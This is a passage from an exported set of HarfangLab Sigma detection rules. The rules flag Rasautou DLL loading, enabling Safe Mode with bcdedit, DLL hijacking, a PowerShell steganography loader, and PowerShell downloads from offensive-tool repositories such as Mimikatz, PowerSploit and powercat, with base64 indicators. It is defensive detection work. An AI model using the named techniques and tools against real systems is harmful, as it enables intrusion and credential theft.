recommended to analyze the process and user session responsible to look for malicious content or actions.\n", "rule_creation_date": "2021-01-06", "rule_modified_date": "2025-02-19", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1548.002", "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1f5a2648-0258-4ffe-93b8-f4aa01a21d2c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.615245Z", "creation_date": "2026-03-23T11:45:34.615249Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.615256Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", "https://attack.mitre.org/techniques/T1218/" ], "name": "t1218_rasautou_execution_proxy.yml", "content": "title: DLL Loaded via Rasautou.exe\nid: 1f5a2648-0258-4ffe-93b8-f4aa01a21d2c\ndescription: |\n Detects a malicious use of Rasautou.exe to load an arbitrary DLL file.\n Adversaries may use specific flags to load and execute arbitrary DLLs within Rasautou.exe and bypass security restrictions.\n It has to be noted that Microsoft has removed those parameters starting with Windows 10, therefore only older versions are impacted.\n It is recommended to check for suspicious activity from the executed process and its parents.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Rasautou/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2024/03/18\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rasautou\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'rasdlui.exe'\n CommandLine|contains|all:\n - '-d'\n - '-p'\n\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1f5a2648-0258-4ffe-93b8-f4aa01a21d2c", "rule_name": "DLL Loaded via Rasautou.exe", "rule_description": "Detects a malicious use of Rasautou.exe to load an arbitrary DLL file.\nAdversaries may use specific flags to load and execute arbitrary DLLs within Rasautou.exe and bypass security restrictions.\nIt has to be noted that Microsoft has removed those parameters starting with Windows 10, therefore only older versions are impacted.\nIt is recommended to check for suspicious activity from the executed process and its parents.\n", "rule_creation_date": "2024-03-18", "rule_modified_date": "2025-02-03", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1218" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1f8de2c5-e4de-49b9-8e1e-9753cb9c3f48", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.619770Z", "creation_date": "2026-03-23T11:45:34.619773Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.619777Z", "rule_level": "low", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1087/001/", "https://attack.mitre.org/techniques/T1033/" ], "name": "t1033_w_macos.yml", "content": "title: Current Logged In Users Discovered via W\nid: 1f8de2c5-e4de-49b9-8e1e-9753cb9c3f48\ndescription: |\n Detects the execution of the w command.\n Attackers may use it during the discovery phase of an attack to retrieve the list of users currently logged in and their last action on the system.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1087/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/w'\n ParentImage|contains: '?'\n\n exclusion_globalprotect:\n GrandparentImage: '/Applications/GlobalProtect.app/Contents/MacOS/GlobalProtect'\n\n exclusion_kaspersky:\n ParentImage: '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1f8de2c5-e4de-49b9-8e1e-9753cb9c3f48", "rule_name": "Current Logged In Users Discovered via W", "rule_description": "Detects the execution of the w command.\nAttackers may use it during the discovery phase of an attack to retrieve the list of users currently logged in and their last action on the system.\nIt is recommended to check for other suspicious activity by the parent process.\n", "rule_creation_date": "2022-11-14", "rule_modified_date": "2026-02-11", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.discovery" ], "rule_technique_tags": [ "attack.t1033", "attack.t1087.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1f9140ad-7310-4971-817e-bc52afe6b553", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.087751Z", "creation_date": "2026-03-23T11:45:34.087753Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.087757Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/" ], "name": "t1529_enable_safemode.yml", "content": "title: Windows Safe-Mode Enabled\nid: 1f9140ad-7310-4971-817e-bc52afe6b553\ndescription: |\n Detects the activation of the Windows Safe-Mode.\n When restarted in Safe-Mode, many detection features are disabled.\n Attackers may enable Windows Safe-Mode to disable detection software and avoid detection.\n It is recommended to investigate the parent process to determine if this action was legitimate.\nreferences:\n - https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/\ndate: 2021/03/19\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1529\n - attack.t1542\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\bcdedit.exe'\n - OriginalFileName: 'bcdedit.exe'\n selection_2:\n CommandLine|contains|all:\n - '/set'\n - 'safeboot'\n selection_3:\n CommandLine|contains:\n - 'minimal'\n - 'network'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1f9140ad-7310-4971-817e-bc52afe6b553", "rule_name": "Windows Safe-Mode Enabled", "rule_description": "Detects the activation of the Windows Safe-Mode.\nWhen restarted in Safe-Mode, many detection features are disabled.\nAttackers may enable Windows Safe-Mode to disable detection software and avoid detection.\nIt is recommended to investigate the parent process to determine if this action was legitimate.\n", "rule_creation_date": "2021-03-19", "rule_modified_date": "2025-01-28", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1529", "attack.t1542" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1fa76d65-e12e-4570-a4d7-bec1023044e3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.093760Z", "creation_date": "2026-03-23T11:45:34.093762Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.093766Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/xforcered/WFH", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_dfsdiag.yml", "content": "title: DLL Hijacking via DfsDiag.exe\nid: 1fa76d65-e12e-4570-a4d7-bec1023044e3\ndescription: |\n Detects potential Windows DLL Hijacking via DfsDiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'DfsDiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\netapi32.dll'\n - '\\resutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1fa76d65-e12e-4570-a4d7-bec1023044e3", "rule_name": "DLL Hijacking via DfsDiag.exe", "rule_description": "Detects potential Windows DLL Hijacking via DfsDiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1fdb3367-1225-4b9e-99c5-2a202390b38b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.606938Z", "creation_date": "2026-03-23T11:45:34.606941Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.606949Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb", "https://attack.mitre.org/techniques/T1059/001/", "https://attack.mitre.org/techniques/T1027/003/" ], "name": "t1059_001_powershell_steganography_loader.yml", "content": "title: PowerShell Steganography Loader\nid: 1fdb3367-1225-4b9e-99c5-2a202390b38b\ndescription: |\n Detects a specific PowerShell command-line used to download a JPG image containing a hidden base64 encoded .NET payload using a simple steganography technique.\n The .NET assembly then downloads the final malware payload, a RAT such as Remcos, subsequently injecting, and initiating its malicious operation within the victim’s system.\n This action is often related to a phishing campaign.\n It is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\nreferences:\n - https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/003/\ndate: 2023/09/29\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1027.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains|all:\n - '<>'\n - '<>'\n - '[System.Convert]::FromBase64String('\n - '[System.Reflection.Assembly]::Load('\n\n condition: selection\nlevel: critical\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1fdb3367-1225-4b9e-99c5-2a202390b38b", "rule_name": "PowerShell Steganography Loader", "rule_description": "Detects a specific PowerShell command-line used to download a JPG image containing a hidden base64 encoded .NET payload using a simple steganography technique.\nThe .NET assembly then downloads the final malware payload, a RAT such as Remcos, subsequently injecting, and initiating its malicious operation within the victim’s system.\nThis action is often related to a phishing campaign.\nIt is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\n", "rule_creation_date": "2023-09-29", "rule_modified_date": "2025-02-03", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.execution" ], "rule_technique_tags": [ "attack.t1027.003", "attack.t1059.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2029c7d2-ce99-4765-bef4-8aa8277d9a50", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.092344Z", "creation_date": "2026-03-23T11:45:34.092346Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.092351Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1059/001/" ], "name": "t1059_001_powershell_malicious_urls_script.yml", "content": "title: URLs of Malicious Code Repository in PowerShell Script\nid: 2029c7d2-ce99-4765-bef4-8aa8277d9a50\ndescription: |\n Detects PowerShell scripts containing URLs that reference known malicious code or offensive tooling repositories.\n Threat actors frequently use public repositories and open-source PowerShell scripts in their attacks.\n It is recommended to investigate the repository being accessed, and examine any files or data that may have been downloaded. If your organization is not undergoing a security audit, this could indicate the initial stages of an attack or ongoing malicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/24\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_1:\n PowershellCommand|contains:\n - '/raw.githubusercontent.com/'\n - 'LwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - '8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n - 'vAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '/gist.githubusercontent.com/'\n - 'LwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '8AZwBpAHMAdAAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - 'vAGcAaQBzAHQALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n\n selection_2:\n PowershellCommand|contains:\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Find-Fruit.ps1\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\n - '/S3cur3Th1sSh1t/'\n # /S3cur3Th1sSh1t/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwBTADMAYwB1AHIAMwBUAGgAMQBzAFMAaAAxAHQALw'\n - '8AUwAzAGMAdQByADMAVABoADEAcwBTAGgAMQB0AC8A'\n - 'vAFMAMwBjAHUAcgAzAFQAaAAxAHMAUwBoADEAdAAvA'\n # 'https://raw.githubusercontent.com/pwnieexpress/Metasploit-framework/master/exploits/powershell/powerdump.ps1\n - '/pwnieexpress/'\n - 'LwBwAHcAbgBpAGUAZQB4AHAAcgBlAHMAcwAvA'\n - '8AcAB3AG4AaQBlAGUAeABwAHIAZQBzAHMALw'\n - 'vAHAAdwBuAGkAZQBlAHgAcAByAGUAcwBzAC8A'\n # https://raw.githubusercontent.com/EmpireProject/Empire/master/module_source/credentials/Invoke-Mimikatz.ps1\n - '/EmpireProject/'\n - 'LwBFAG0AcABpAHIAZQBQAHIAbwBqAGUAYwB0AC8A'\n - '8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvA'\n - 'vAEUAbQBwAGkAcgBlAFAAcgBvAGoAZQBjAHQALw'\n # https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1\n - '/PowerSploit/'\n - 'LwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALw'\n - '8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8A'\n - 'vAFAAbwB3AGUAcgBTAHAAbABvAGkAdAAvA'\n # https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1\n - '/clymb3r/'\n - 'LwBjAGwAeQBtAGIAMwByAC8A'\n - '8AYwBsAHkAbQBiADMAcgAvA'\n - 'vAGMAbAB5AG0AYgAzAHIALw'\n - '/Invoke-Mimikatz/'\n - 'LwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAvA'\n - '8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALw'\n - 'vAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC8A'\n # https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1\n - '/BloodHoundAD/'\n - 'LwBCAGwAbwBvAGQASABvAHUAbgBkAEEARAAvA'\n - '8AQgBsAG8AbwBkAEgAbwB1AG4AZABBAEQALw'\n - 'vAEIAbABvAG8AZABIAG8AdQBuAGQAQQBEAC8A'\n # https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1\n - '/Kevin-Robertson/'\n - 'LwBLAGUAdgBpAG4ALQBSAG8AYgBlAHIAdABzAG8AbgAvA'\n - '8ASwBlAHYAaQBuAC0AUgBvAGIAZQByAHQAcwBvAG4ALw'\n - 'vAEsAZQB2AGkAbgAtAFIAbwBiAGUAcgB0AHMAbwBuAC8A'\n # https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/PowerSploit/Invoke-Mimikatz.ps1\n - '/Veil-Framework/'\n - 'LwBWAGUAaQBsAC0ARgByAGEAbQBlAHcAbwByAGsALw'\n - '8AVgBlAGkAbAAtAEYAcgBhAG0AZQB3AG8AcgBrAC8A'\n - 'vAFYAZQBpAGwALQBGAHIAYQBtAGUAdwBvAHIAawAvA'\n # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/Get-SPN/Get-SPN.psm1\n - '/nullbind/Powershellery/'\n - 'LwBuAHUAbABsAGIAaQBuAGQALwBQAG8AdwBlAHIAcwBoAGUAbABsAGUAcgB5AC8A'\n - '8AbgB1AGwAbABiAGkAbgBkAC8AUABvAHcAZQByAHMAaABlAGwAbABlAHIAeQAvA'\n - 'vAG4AdQBsAGwAYgBpAG4AZAAvAFAAbwB3AGUAcgBzAGgAZQBsAGwAZQByAHkALw'\n # https://gist.githubusercontent.com/shantanu561993/6483e524dc225a188de04465c8512909/raw/db219421ea911b820e9a484754f03a26fbfb9c27/AMSI_bypass_Reflection.ps1\n - '/shantanu561993/'\n - 'LwBzAGgAYQBuAHQAYQBuAHUANQA2ADEAOQA5ADMALw'\n - '8AcwBoAGEAbgB0AGEAbgB1ADUANgAxADkAOQAzAC8A'\n - 'vAHMAaABhAG4AdABhAG4AdQA1ADYAMQA5ADkAMwAvA'\n # https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\n - '/powercat/'\n - 'LwBwAG8AdwBlAHIAYwBhAHQALw'\n - '8AcABvAHcAZQByAGMAYQB0AC8A'\n - 'vAHAAbwB3AGUAcgBjAGEAdAAvA'\n # https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - '/FuzzySecurity/PowerShell-Suite/'\n - 'LwBGAHUAegB6AHkAUwBlAGMAdQByAGkAdAB5AC8AUABvAHcAZQByAFMAaABlAGwAbAAtAFMAdQBpAHQAZQAvA'\n - '8ARgB1AHoAegB5AFMAZQBjAHUAcgBpAHQAeQAvAFAAbwB3AGUAcgBTAGgAZQBsAGwALQBTAHUAaQB0AGUALw'\n - 'vAEYAdQB6AHoAeQBTAGUAYwB1AHIAaQB0AHkALwBQAG8AdwBlAHIAUwBoAGUAbABsAC0AUwB1AGkAdABlAC8A'\n # https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1\n - '/The-Viper-One/'\n - 'LwBUAGgAZQAtAFYAaQBwAGUAcgAtAE8AbgBlAC8A'\n - '8AVABoAGUALQBWAGkAcABlAHIALQBPAG4AZQAvA'\n - 'vAFQAaABlAC0AVgBpAHAAZQByAC0ATwBuAGUALw'\n # https://raw.githubusercontent.com/leoloobeek/LAPSToolkit/refs/heads/master/LAPSToolkit.ps1\n - '/leoloobeek/'\n - 'LwBsAGUAbwBsAG8AbwBiAGUAZQBrAC8A'\n - '8AbABlAG8AbABvAG8AYgBlAGUAawAvA'\n - 'vAGwAZQBvAGwAbwBvAGIAZQBlAGsALw'\n # https://raw.githubusercontent.com/sense-of-security/ADRecon/refs/heads/master/ADRecon.ps1\n - '/sense-of-security/'\n - 'LwBzAGUAbgBzAGUALQBvAGYALQBzAGUAYwB1AHIAaQB0AHkALw'\n - '8AcwBlAG4AcwBlAC0AbwBmAC0AcwBlAGMAdQByAGkAdAB5AC8A'\n - 'vAHMAZQBuAHMAZQAtAG8AZgAtAHMAZQBjAHUAcgBpAHQAeQAvA'\n # https://github.com/Friends-Security/ShadowHound/raw/refs/heads/main/ShadowHound-ADM.ps1\n # https://github.com/Friends-Security/ShadowHound/raw/refs/heads/main/ShadowHound-DS.ps1\n - '/Friends-Security/'\n - 'LwBGAHIAaQBlAG4AZABzAC0AUwBlAGMAdQByAGkAdAB5AC8A'\n - '8ARgByAGkAZQBuAGQAcwAtAFMAZQBjAHUAcgBpAHQAeQAvA'\n - 'vAEYAcgBpAGUAbgBkAHMALQBTAGUAYwB1AHIAaQB0AHkALw'\n # https://github.com/dafthack/GraphRunner\n # https://github.com/dafthack/MFASweep\n # https://github.com/dafthack/MailSniper\n - '/dafthack/'\n - 'LwBkAGEAZgB0AGgAYQBjAGsALw'\n - '8AZABhAGYAdABoAGEAYwBrAC8A'\n - 'vAGQAYQBmAHQAaABhAGMAawAvA'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2029c7d2-ce99-4765-bef4-8aa8277d9a50", "rule_name": "URLs of Malicious Code Repository in PowerShell Script", "rule_description": "Detects PowerShell scripts containing URLs that reference known malicious code or offensive tooling repositories.\nThreat actors frequently use public repositories and open-source PowerShell scripts in their attacks.\nIt is recommended to investigate the repository being accessed, and examine any files or data that may have been downloaded. If your organization is not undergoing a security audit, this could indicate the initial stages of an attack or ongoing malicious activity.\n", "rule_creation_date": "2021-06-24", "rule_modified_date": "2025-04-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1059.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2097d94f-4a7d-417e-8cb0-063a71e4cd4c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.591189Z", "creation_date": "2026-03-23T11:45:34.591192Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.591200Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://wietze.github.io/blog/save-the-environment-variables", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_scriptrunner.yml", "content": "title: DLL Hijacking via ScriptRunner.exe\nid: 2097d94f-4a7d-417e-8cb0-063a71e4cd4c\ndescription: |\n Detects potential Windows DLL Hijacking via ScriptRunner.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ScriptRunner.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla 